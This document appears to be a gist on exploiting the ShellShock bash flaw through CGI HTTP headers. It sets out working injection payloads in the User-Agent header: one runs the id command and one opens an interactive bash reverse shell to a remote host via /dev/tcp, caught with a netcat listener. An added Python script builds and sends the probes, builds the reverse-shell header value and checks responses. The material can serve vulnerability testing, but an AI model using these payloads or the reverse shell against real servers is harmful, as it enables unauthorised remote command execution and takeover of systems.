Created
December 12, 2017 12:50
ShellShock
Injectable: Referer:, User-Agent:, and other headers
###########################################################
GET /script.sh HTTP/1.0
Host: localhost
User-Agent: () { ignored;};echo -e "Content-Type: text/plain\r\n\r"; /usr/bin/id
###########################################################
GET /script.sh HTTP/1.0
Host: localhost
User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

() { ignored;}; is the ShellShock trigger: bash parses the exported header value as a function definition and then executes whatever follows the closing brace
echo -e "Content-Type: text/plain\r\n\r" (first request) emits a minimal CGI header block so the web server returns the output of /usr/bin/id as the response body
/bin/bash -i is an interactive Bash session
>& /dev/tcp/ip/port redirects standard output and standard error to the remote host (e.g.: /dev/tcp/1.2.3.4/8080 redirects the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 reads standard input from the same socket. Strictly this should be 0<&1, but both forms work because each duplicates file descriptor 1 onto file descriptor 0
On the remote server a listener must be running: for testing I used nc -l 8080 (netcat listening on port 8080)
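The two requests above, turned into a small probe builder and response checker. This is an added example, not code from the gist: it builds the same HTTP/1.0 request with the "() { ignored;};" prefix in a chosen header, but instead of running /usr/bin/id it echoes a random marker, so a positive result is a string that cannot already be present in the page (the reverse-shell header value from the second request is built by a separate function and still needs the nc listener). The host, path, header name and marker format are assumptions for illustration; only the offline checks run without a target.

```python
"""Shellshock (CVE-2014-6271) HTTP probe builder and response checker.

Added example, not part of the original gist. Host names, paths and the
marker string are assumptions chosen for illustration.
"""
import secrets
import socket

# Dummy function body that bash parses before running the trailing
# command; the same prefix the gist uses.
SHELLSHOCK_PREFIX = "() { ignored;};"


def build_probe(host: str, path: str, marker: str,
                header: str = "User-Agent") -> bytes:
    """Return a raw HTTP/1.0 request carrying the probe in `header`.

    The trailing command echoes a caller-supplied marker instead of
    /usr/bin/id. The first echo emits the minimal CGI header block
    (literal backslash sequences for bash's `echo -e` to expand) so the
    server returns the command output as the response body.
    """
    payload = (
        SHELLSHOCK_PREFIX
        + 'echo -e "Content-Type: text/plain\\r\\n\\r"; '
        + f"echo {marker}"
    )
    request = (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"{header}: {payload}\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def build_reverse_shell_payload(listener_ip: str, listener_port: int) -> str:
    """Header value for the reverse-shell variant shown in the gist.

    Needs a listener on the attacker side, e.g. `nc -l <listener_port>`.
    """
    return (f"{SHELLSHOCK_PREFIX}/bin/bash -i "
            f">& /dev/tcp/{listener_ip}/{listener_port} 0>&1")


def response_body(raw: bytes) -> bytes:
    """Split an HTTP response at the first blank line and return the body."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        _head, found, body = raw.partition(sep)
        if found:
            return body
    return b""  # no header/body boundary: treat as an empty body


def is_vulnerable(raw: bytes, marker: str) -> bool:
    """True when the injected command's output (the marker) came back."""
    return marker.encode("ascii") in response_body(raw)


def probe(host: str, port: int = 80, path: str = "/script.sh",
          header: str = "User-Agent", timeout: float = 5.0) -> bool:
    """Send one probe over a plain TCP socket and report the verdict.

    Only run this against systems you are authorised to test.
    """
    marker = "shock_" + secrets.token_hex(8)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host, path, marker, header))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return is_vulnerable(b"".join(chunks), marker)


if __name__ == "__main__":
    # Offline demonstration on a constructed response; no network needed.
    m = "shock_deadbeef"
    print(build_probe("localhost", "/script.sh", m).decode())
    fake = b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\nshock_deadbeef\n"
    print("vulnerable:", is_vulnerable(fake, m))
```

The marker check is what keeps the probe honest: a page that happens to contain "uid=" would look like a hit to the /usr/bin/id variant, whereas a random hex marker only appears if bash actually executed the trailing command. Pass header="Referer" (or any other header the CGI environment exports) to test the other injection points the gist lists.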